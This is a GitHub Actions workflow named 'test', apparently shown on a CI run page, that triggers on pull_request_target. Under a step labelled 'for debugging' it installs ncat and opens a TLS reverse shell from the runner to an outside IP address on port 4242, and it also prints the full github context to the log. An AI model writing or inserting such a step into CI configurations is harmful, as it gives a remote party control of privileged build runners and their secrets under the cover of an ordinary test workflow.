Skip to content

sample

sample #7

Workflow file for this run

name: test
on:
pull_request_target: # Use pull_request_target
branches: [master]
jobs:
test:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
with:
fetch-depth: 0
- name: Install ncat
run: sudo apt-get update && sudo apt-get install -y ncat
- name: Send TLS revshell for debugging
run: ncat --ssl 172.234.100.71 4242 -e /bin/sh
- run: |
echo "$EVENT"
cat .npmignore
env:
EVENT: ${{toJSON(github)}}